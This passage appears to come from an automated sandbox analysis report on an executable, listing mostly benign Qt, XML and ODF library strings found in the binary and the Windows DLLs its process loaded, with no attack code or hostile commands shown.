6.png:/qt-project.org/styles/commonstyle/images/standardbutton-cancel-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-help-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-open-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-save-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-close-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-apply-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-clear-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-delete-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-yes-16.png:/qt-project.org/styles/commonstyle/images/standardbutton
              Source: BDxsBr8Dce.exeString found in binary or memory: w:/qt-project.org/styles/commonstyle/images/standardbutton-closetab-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-closetab-down-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-closetab-hover-16.png1_q_removeAnimation()100%QCommonStyle::drawComplexControl: Control %d not handledQCommonStyle::hitTestComplexControl: Case %d not handledQCommonStyle::subControlRect: Case %d not handledxpm:0x%pdialog-okdialog-ok-applyedit-deletedialog-closeuser-homemessagebox_infomessagebox_warningmessagebox_criticalhelpfolder-openemptytext-x-genericfolder3floppy_unmountmedia-floppycomputeruser-desktoptrashcan_emptyuser-trashcdrom_unmountmedia-opticalhdd_unmountdrive-harddiskupgo-upfolder_newdowngo-downforwardgo-nextbackgo-previousview_detailedview_iconreloadprocess-stopmedia-playback-startmedia-playback-pausemedia-playback-stopmedia-seek-forwardmedia-seek-backwardmedia-skip-forwardmedia-skip-backwardedit-clearhelp-contentsdialog-canceldocument-saveemblem-symbolic-link:/qt-project.org/styles/commonstyle/images/left-16.png:/qt-project.org/styles/commonstyle/images/right-16.png:/qt-project.org/styles/commonstyle/images/up-16.png:/qt-project.org/styles/commonstyle/images/down-16.png:/qt-project.org/styles/commonstyle/images/newdirectory-16.png:/qt-project.org/styles/commonstyle/images/viewdetailed-16.png:/qt-project.org/styles/commonstyle/images/fileinfo-16.png:/qt-project.org/styles/commonstyle/images/filecontents-16.png:/qt-project.org/styles/commonstyle/images/viewlist-16.png:/qt-project.org/styles/commonstyle/images/harddrive-16.png:/qt-project.org/styles/commonstyle/images/trash-16.png:/qt-project.org/styles/commonstyle/images/floppy-16.png:/qt-project.org/styles/commonstyle/images/networkdrive-16.png:/qt-project.org/styles/commonstyle/images/desktop-16.png:/qt-project.org/styles/commonstyle/images/computer-16.png:/qt-project.org/styles/commonstyle/images/cdr-16.png:/qt-project.org/styles/commonstyle/images/dvd-16.png:/qt-project.org/styles/commonstyle/images/diropen-16.png:/qt-project.org/styles/commonstyle/images/dirclosed-16.png:/qt-project.org/styles/commonstyle/images/dirlink-16.png:/qt-project.org/styles/commonstyle/images/file-16.png:/qt-project.org/styles/commonstyle/images/filelink-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-ok-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-cancel-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-help-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-open-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-save-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-close-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-apply-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-clear-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-delete-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-yes-16.png:/qt-project.org/styles/commonstyle/images/standardbutton
              Source: BDxsBr8Dce.exeString found in binary or memory: w:/qt-project.org/styles/commonstyle/images/standardbutton-closetab-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-closetab-down-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-closetab-hover-16.png1_q_removeAnimation()100%QCommonStyle::drawComplexControl: Control %d not handledQCommonStyle::hitTestComplexControl: Case %d not handledQCommonStyle::subControlRect: Case %d not handledxpm:0x%pdialog-okdialog-ok-applyedit-deletedialog-closeuser-homemessagebox_infomessagebox_warningmessagebox_criticalhelpfolder-openemptytext-x-genericfolder3floppy_unmountmedia-floppycomputeruser-desktoptrashcan_emptyuser-trashcdrom_unmountmedia-opticalhdd_unmountdrive-harddiskupgo-upfolder_newdowngo-downforwardgo-nextbackgo-previousview_detailedview_iconreloadprocess-stopmedia-playback-startmedia-playback-pausemedia-playback-stopmedia-seek-forwardmedia-seek-backwardmedia-skip-forwardmedia-skip-backwardedit-clearhelp-contentsdialog-canceldocument-saveemblem-symbolic-link:/qt-project.org/styles/commonstyle/images/left-16.png:/qt-project.org/styles/commonstyle/images/right-16.png:/qt-project.org/styles/commonstyle/images/up-16.png:/qt-project.org/styles/commonstyle/images/down-16.png:/qt-project.org/styles/commonstyle/images/newdirectory-16.png:/qt-project.org/styles/commonstyle/images/viewdetailed-16.png:/qt-project.org/styles/commonstyle/images/fileinfo-16.png:/qt-project.org/styles/commonstyle/images/filecontents-16.png:/qt-project.org/styles/commonstyle/images/viewlist-16.png:/qt-project.org/styles/commonstyle/images/harddrive-16.png:/qt-project.org/styles/commonstyle/images/trash-16.png:/qt-project.org/styles/commonstyle/images/floppy-16.png:/qt-project.org/styles/commonstyle/images/networkdrive-16.png:/qt-project.org/styles/commonstyle/images/desktop-16.png:/qt-project.org/styles/commonstyle/images/computer-16.png:/qt-project.org/styles/commonstyle/images/cdr-16.png:/qt-project.org/styles/commonstyle/images/dvd-16.png:/qt-project.org/styles/commonstyle/images/diropen-16.png:/qt-project.org/styles/commonstyle/images/dirclosed-16.png:/qt-project.org/styles/commonstyle/images/dirlink-16.png:/qt-project.org/styles/commonstyle/images/file-16.png:/qt-project.org/styles/commonstyle/images/filelink-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-ok-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-cancel-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-help-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-open-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-save-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-close-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-apply-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-clear-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-delete-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-yes-16.png:/qt-project.org/styles/commonstyle/images/standardbutton
              Source: BDxsBr8Dce.exeString found in binary or memory: w:/qt-project.org/styles/commonstyle/images/standardbutton-closetab-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-closetab-down-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-closetab-hover-16.png1_q_removeAnimation()100%QCommonStyle::drawComplexControl: Control %d not handledQCommonStyle::hitTestComplexControl: Case %d not handledQCommonStyle::subControlRect: Case %d not handledxpm:0x%pdialog-okdialog-ok-applyedit-deletedialog-closeuser-homemessagebox_infomessagebox_warningmessagebox_criticalhelpfolder-openemptytext-x-genericfolder3floppy_unmountmedia-floppycomputeruser-desktoptrashcan_emptyuser-trashcdrom_unmountmedia-opticalhdd_unmountdrive-harddiskupgo-upfolder_newdowngo-downforwardgo-nextbackgo-previousview_detailedview_iconreloadprocess-stopmedia-playback-startmedia-playback-pausemedia-playback-stopmedia-seek-forwardmedia-seek-backwardmedia-skip-forwardmedia-skip-backwardedit-clearhelp-contentsdialog-canceldocument-saveemblem-symbolic-link:/qt-project.org/styles/commonstyle/images/left-16.png:/qt-project.org/styles/commonstyle/images/right-16.png:/qt-project.org/styles/commonstyle/images/up-16.png:/qt-project.org/styles/commonstyle/images/down-16.png:/qt-project.org/styles/commonstyle/images/newdirectory-16.png:/qt-project.org/styles/commonstyle/images/viewdetailed-16.png:/qt-project.org/styles/commonstyle/images/fileinfo-16.png:/qt-project.org/styles/commonstyle/images/filecontents-16.png:/qt-project.org/styles/commonstyle/images/viewlist-16.png:/qt-project.org/styles/commonstyle/images/harddrive-16.png:/qt-project.org/styles/commonstyle/images/trash-16.png:/qt-project.org/styles/commonstyle/images/floppy-16.png:/qt-project.org/styles/commonstyle/images/networkdrive-16.png:/qt-project.org/styles/commonstyle/images/desktop-16.png:/qt-project.org/styles/commonstyle/images/computer-16.png:/qt-project.org/styles/commonstyle/images/cdr-16.png:/qt-project.org/styles/commonstyle/images/dvd-16.png:/qt-project.org/styles/commonstyle/images/diropen-16.png:/qt-project.org/styles/commonstyle/images/dirclosed-16.png:/qt-project.org/styles/commonstyle/images/dirlink-16.png:/qt-project.org/styles/commonstyle/images/file-16.png:/qt-project.org/styles/commonstyle/images/filelink-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-ok-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-cancel-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-help-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-open-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-save-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-close-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-apply-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-clear-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-delete-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-yes-16.png:/qt-project.org/styles/commonstyle/images/standardbutton
              Source: BDxsBr8Dce.exeString found in binary or memory: w:/qt-project.org/styles/commonstyle/images/standardbutton-closetab-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-closetab-down-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-closetab-hover-16.png1_q_removeAnimation()100%QCommonStyle::drawComplexControl: Control %d not handledQCommonStyle::hitTestComplexControl: Case %d not handledQCommonStyle::subControlRect: Case %d not handledxpm:0x%pdialog-okdialog-ok-applyedit-deletedialog-closeuser-homemessagebox_infomessagebox_warningmessagebox_criticalhelpfolder-openemptytext-x-genericfolder3floppy_unmountmedia-floppycomputeruser-desktoptrashcan_emptyuser-trashcdrom_unmountmedia-opticalhdd_unmountdrive-harddiskupgo-upfolder_newdowngo-downforwardgo-nextbackgo-previousview_detailedview_iconreloadprocess-stopmedia-playback-startmedia-playback-pausemedia-playback-stopmedia-seek-forwardmedia-seek-backwardmedia-skip-forwardmedia-skip-backwardedit-clearhelp-contentsdialog-canceldocument-saveemblem-symbolic-link:/qt-project.org/styles/commonstyle/images/left-16.png:/qt-project.org/styles/commonstyle/images/right-16.png:/qt-project.org/styles/commonstyle/images/up-16.png:/qt-project.org/styles/commonstyle/images/down-16.png:/qt-project.org/styles/commonstyle/images/newdirectory-16.png:/qt-project.org/styles/commonstyle/images/viewdetailed-16.png:/qt-project.org/styles/commonstyle/images/fileinfo-16.png:/qt-project.org/styles/commonstyle/images/filecontents-16.png:/qt-project.org/styles/commonstyle/images/viewlist-16.png:/qt-project.org/styles/commonstyle/images/harddrive-16.png:/qt-project.org/styles/commonstyle/images/trash-16.png:/qt-project.org/styles/commonstyle/images/floppy-16.png:/qt-project.org/styles/commonstyle/images/networkdrive-16.png:/qt-project.org/styles/commonstyle/images/desktop-16.png:/qt-project.org/styles/commonstyle/images/computer-16.png:/qt-project.org/styles/commonstyle/images/cdr-16.png:/qt-project.org/styles/commonstyle/images/dvd-16.png:/qt-project.org/styles/commonstyle/images/diropen-16.png:/qt-project.org/styles/commonstyle/images/dirclosed-16.png:/qt-project.org/styles/commonstyle/images/dirlink-16.png:/qt-project.org/styles/commonstyle/images/file-16.png:/qt-project.org/styles/commonstyle/images/filelink-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-ok-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-cancel-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-help-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-open-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-save-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-close-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-apply-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-clear-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-delete-16.png:/qt-project.org/styles/commonstyle/images/standardbutton-yes-16.png:/qt-project.org/styles/commonstyle/images/standardbutton
              Source: BDxsBr8Dce.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/standardbutton-help-32.png
              Source: BDxsBr8Dce.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/standardbutton-help-128.png
              Source: BDxsBr8Dce.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/stop-32.png
              Source: BDxsBr8Dce.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/stop-32.png
              Source: BDxsBr8Dce.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/media-stop-16.png
              Source: BDxsBr8Dce.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/cleartext-16.pngdialog-informationdialog-warningdialog-errordialog-questionfloppy_unmountfolder-newwindow-closeview-list-detailsview-list-iconsview-refreshaudio-volume-mediumaudio-volume-muted:/qt-project.org/styles/commonstyle/images/newdirectory-32.png:/qt-project.org/styles/commonstyle/images/newdirectory-128.png:/qt-project.org/styles/commonstyle/images/viewdetailed-32.png:/qt-project.org/styles/commonstyle/images/viewdetailed-128.png:/qt-project.org/styles/commonstyle/images/fileinfo-32.png:/qt-project.org/styles/commonstyle/images/fileinfo-128.png:/qt-project.org/styles/commonstyle/images/filecontents-32.png:/qt-project.org/styles/commonstyle/images/filecontents-128.png:/qt-project.org/styles/commonstyle/images/viewlist-32.png:/qt-project.org/styles/commonstyle/images/viewlist-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-ok-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-ok-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-cancel-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-cancel-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-help-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-help-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-open-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-open-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-save-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-save-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-close-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-close-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-apply-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-apply-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-clear-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-clear-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-delete-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-delete-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-yes-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-yes-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-no-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-no-128.png:/qt-project.org/styles/commonstyle/images/left-32.png:/qt-project.org/styles/commonstyle/images/left-128.png:/qt-project.org/styles/commonstyle/images/right-32.png:/qt-project.org/styles/commonstyle/images/right-128.png:/qt-project.org/styles/commonstyle/images/up-32.png:/qt-project.org/styles/commonstyle/images/up-128.png:/qt-project.org/styles/commonstyle/images/down-32.png:/qt-project.org/styles/commonstyle/images/down-128.png:/qt-project.org/styles/commonstyle/images/dirclosed-32.png:/qt-project.org/styles/commonstyle/images/diropen-32.png:/qt-project.org/styles/commonstyle/images/dirclosed-128.png:/qt-project.
              Source: BDxsBr8Dce.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/cleartext-16.pngdialog-informationdialog-warningdialog-errordialog-questionfloppy_unmountfolder-newwindow-closeview-list-detailsview-list-iconsview-refreshaudio-volume-mediumaudio-volume-muted:/qt-project.org/styles/commonstyle/images/newdirectory-32.png:/qt-project.org/styles/commonstyle/images/newdirectory-128.png:/qt-project.org/styles/commonstyle/images/viewdetailed-32.png:/qt-project.org/styles/commonstyle/images/viewdetailed-128.png:/qt-project.org/styles/commonstyle/images/fileinfo-32.png:/qt-project.org/styles/commonstyle/images/fileinfo-128.png:/qt-project.org/styles/commonstyle/images/filecontents-32.png:/qt-project.org/styles/commonstyle/images/filecontents-128.png:/qt-project.org/styles/commonstyle/images/viewlist-32.png:/qt-project.org/styles/commonstyle/images/viewlist-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-ok-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-ok-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-cancel-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-cancel-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-help-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-help-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-open-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-open-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-save-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-save-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-close-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-close-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-apply-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-apply-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-clear-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-clear-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-delete-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-delete-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-yes-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-yes-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-no-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-no-128.png:/qt-project.org/styles/commonstyle/images/left-32.png:/qt-project.org/styles/commonstyle/images/left-128.png:/qt-project.org/styles/commonstyle/images/right-32.png:/qt-project.org/styles/commonstyle/images/right-128.png:/qt-project.org/styles/commonstyle/images/up-32.png:/qt-project.org/styles/commonstyle/images/up-128.png:/qt-project.org/styles/commonstyle/images/down-32.png:/qt-project.org/styles/commonstyle/images/down-128.png:/qt-project.org/styles/commonstyle/images/dirclosed-32.png:/qt-project.org/styles/commonstyle/images/diropen-32.png:/qt-project.org/styles/commonstyle/images/dirclosed-128.png:/qt-project.
              Source: BDxsBr8Dce.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/cleartext-16.pngdialog-informationdialog-warningdialog-errordialog-questionfloppy_unmountfolder-newwindow-closeview-list-detailsview-list-iconsview-refreshaudio-volume-mediumaudio-volume-muted:/qt-project.org/styles/commonstyle/images/newdirectory-32.png:/qt-project.org/styles/commonstyle/images/newdirectory-128.png:/qt-project.org/styles/commonstyle/images/viewdetailed-32.png:/qt-project.org/styles/commonstyle/images/viewdetailed-128.png:/qt-project.org/styles/commonstyle/images/fileinfo-32.png:/qt-project.org/styles/commonstyle/images/fileinfo-128.png:/qt-project.org/styles/commonstyle/images/filecontents-32.png:/qt-project.org/styles/commonstyle/images/filecontents-128.png:/qt-project.org/styles/commonstyle/images/viewlist-32.png:/qt-project.org/styles/commonstyle/images/viewlist-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-ok-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-ok-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-cancel-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-cancel-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-help-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-help-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-open-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-open-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-save-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-save-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-close-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-close-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-apply-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-apply-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-clear-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-clear-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-delete-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-delete-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-yes-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-yes-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-no-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-no-128.png:/qt-project.org/styles/commonstyle/images/left-32.png:/qt-project.org/styles/commonstyle/images/left-128.png:/qt-project.org/styles/commonstyle/images/right-32.png:/qt-project.org/styles/commonstyle/images/right-128.png:/qt-project.org/styles/commonstyle/images/up-32.png:/qt-project.org/styles/commonstyle/images/up-128.png:/qt-project.org/styles/commonstyle/images/down-32.png:/qt-project.org/styles/commonstyle/images/down-128.png:/qt-project.org/styles/commonstyle/images/dirclosed-32.png:/qt-project.org/styles/commonstyle/images/diropen-32.png:/qt-project.org/styles/commonstyle/images/dirclosed-128.png:/qt-project.
              Source: BDxsBr8Dce.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/cleartext-16.pngdialog-informationdialog-warningdialog-errordialog-questionfloppy_unmountfolder-newwindow-closeview-list-detailsview-list-iconsview-refreshaudio-volume-mediumaudio-volume-muted:/qt-project.org/styles/commonstyle/images/newdirectory-32.png:/qt-project.org/styles/commonstyle/images/newdirectory-128.png:/qt-project.org/styles/commonstyle/images/viewdetailed-32.png:/qt-project.org/styles/commonstyle/images/viewdetailed-128.png:/qt-project.org/styles/commonstyle/images/fileinfo-32.png:/qt-project.org/styles/commonstyle/images/fileinfo-128.png:/qt-project.org/styles/commonstyle/images/filecontents-32.png:/qt-project.org/styles/commonstyle/images/filecontents-128.png:/qt-project.org/styles/commonstyle/images/viewlist-32.png:/qt-project.org/styles/commonstyle/images/viewlist-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-ok-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-ok-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-cancel-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-cancel-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-help-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-help-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-open-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-open-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-save-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-save-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-close-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-close-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-apply-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-apply-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-clear-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-clear-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-delete-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-delete-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-yes-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-yes-128.png:/qt-project.org/styles/commonstyle/images/standardbutton-no-32.png:/qt-project.org/styles/commonstyle/images/standardbutton-no-128.png:/qt-project.org/styles/commonstyle/images/left-32.png:/qt-project.org/styles/commonstyle/images/left-128.png:/qt-project.org/styles/commonstyle/images/right-32.png:/qt-project.org/styles/commonstyle/images/right-128.png:/qt-project.org/styles/commonstyle/images/up-32.png:/qt-project.org/styles/commonstyle/images/up-128.png:/qt-project.org/styles/commonstyle/images/down-32.png:/qt-project.org/styles/commonstyle/images/down-128.png:/qt-project.org/styles/commonstyle/images/dirclosed-32.png:/qt-project.org/styles/commonstyle/images/diropen-32.png:/qt-project.org/styles/commonstyle/images/dirclosed-128.png:/qt-project.
              Source: BDxsBr8Dce.exeString found in binary or memory: http://trolltech.com/xml/features/report-start-end-entity
              Source: BDxsBr8Dce.exeString found in binary or memory: http://qt-project.org/xml/features/report-start-end-entity
              Source: BDxsBr8Dce.exeString found in binary or memory: http://www.w3.org/XML/1998/namespaceCDATAencodingerror triggered by consumerhttp://qt-project.org/xml/features/report-whitespace-only-CharDatahttp://trolltech.com/xml/features/report-start-end-entityhttp://qt-project.org/xml/features/report-start-end-entityUnknown feature %sunexpected end of file
              Source: BDxsBr8Dce.exeString found in binary or memory: <!--StartFragment-->
              Source: BDxsBr8Dce.exeString found in binary or memory: <!--StartFragment--><!--EndFragment-->
              Source: BDxsBr8Dce.exeString found in binary or memory: tab-stops
              Source: BDxsBr8Dce.exeString found in binary or memory: tab-stop
              Source: BDxsBr8Dce.exeString found in binary or memory: mimetypeurn:oasis:names:tc:opendocument:xmlns:manifest:1.0manifest1.2content.xmlMETA-INF/manifest.xmlfile-entrymedia-typefull-pathtable-columnnumber-columns-repeatedtable-rowtable-cellnumber-columns-spannednumber-rows-spannedT%1style-namelist-itemL%1p%1c%1line-breakautomatic-stylesparagraphparagraph-propertiesendQTextOdfWriter: unsupported paragraph alignment; break-beforebreak-afterkeep-togethertab-stopstab-stoptext-propertiesSanscapitalizeletter-spacingword-spacingsingletext-underline-typetext-line-through-typetext-underline-colordashdash-dot0%-100%text-outlinelist-level-style-numbernum-formatnum-suffixnum-prefixlist-level-style-bulletbullet-charlevellist-level-properties%1mmspace-befores%1section-propertiestable-propertiesautomaticurn:oasis:names:tc:opendocument:xmlns:office:1.0urn:oasis:names:tc:opendocument:xmlns:text:1.0urn:oasis:names:tc:opendocument:xmlns:style:1.0urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0urn:oasis:names:tc:opendocument:xmlns:table:1.0urn:oasis:names:tc:opendocument:xmlns:drawing:1.0http://www.w3.org/1999/xlinkurn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0QTextOdfWriter::writeAll: the device can not be opened for writingofficefodrawxlinkdocument-content
              Source: BDxsBr8Dce.exeString found in binary or memory: in-addr.arpa
              Source: BDxsBr8Dce.exeString found in binary or memory: .nozagan.plchikusei.ibaraki.jpwlocl.plin-addr.arpanotaires.fraltai.ruint.ruaquila.itint.rwito.shizuoka.jpmissoula.museumkolobrzeg.plassabu.hokkaido.jpsld.domeloy.noak.usk12.md.uskawanishi.yamagata.jpis-lost.orgochi.kochi.jpamami.kagoshima.jpgamo.shiga.jpyamazoe.nara.jpshirako.chiba.jpmatsuda.kanagawa.jpint.tjota.tokyo.jpkicks-ass.netyamato.fukushima.jpshinjo.okayama.jpbaltimore.museumushistory.museumpromallorca.museumhoyanger.nohobby-site.comnarvik.noolsztyn.plwarmia.plpol.htint.ttmizusawa.iwate.jph
              Source: BDxsBr8Dce.exeString found in binary or memory: Africa/Addis_Ababa
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile read: C:\Users\user\Desktop\BDxsBr8Dce.exeJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: kernel.appcore.dllJump to behavior
